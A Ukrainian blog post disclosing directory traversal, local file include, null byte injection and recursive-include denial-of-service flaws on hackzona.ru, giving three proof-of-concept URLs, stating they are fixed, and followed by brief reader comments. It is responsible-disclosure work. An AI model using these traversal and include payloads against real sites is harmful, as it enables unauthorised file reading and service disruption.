Нові уразливості на hackzona.ru
23:57 08.10.201119.01.2011
У жовтні, 30.10.2010, я знайшов Directory Traversal, Local File Include, Null Byte Injection та Denial of Service уразливості на хакерському проекті http://hackzona.ru (на DT дірку звернув мою увагу Dementor). Про що найближчим часом сповіщу адміністрацію проекту.
Раніше я вже писав про уразливості на hackzona.ru.
Детальна інформація про уразливості з’явиться пізніше. Треба дати час адмінам на реакцію з цього приводу.
08.10.2011
Directory Traversal + Null Byte Injection:
http://hackzona.ru/hz.php?name=News&file=../../robots.txt%00
Local File Include + Null Byte Injection:
http://hackzona.ru/hz.php?name=News&file=file.php%00
DoS (Recursive File Include):
http://hackzona.ru/hz.php?name=News&file=../../hz
Дані уразливості вже виправлені.
Четвер, 12:36 20.01.2011
оо, ці баги там давненько)
Четвер, 15:35 20.01.2011
Враховуючи серйозність уразливостей та те, як ти сказав, що уразливості на сайті вже давно, то можна зробити висновок, що за безпекою сайта зовсім не слідкують.
Четвер, 19:04 20.01.2011
Ти не помилився, там реально ніхто не слідкує. Я це знаю.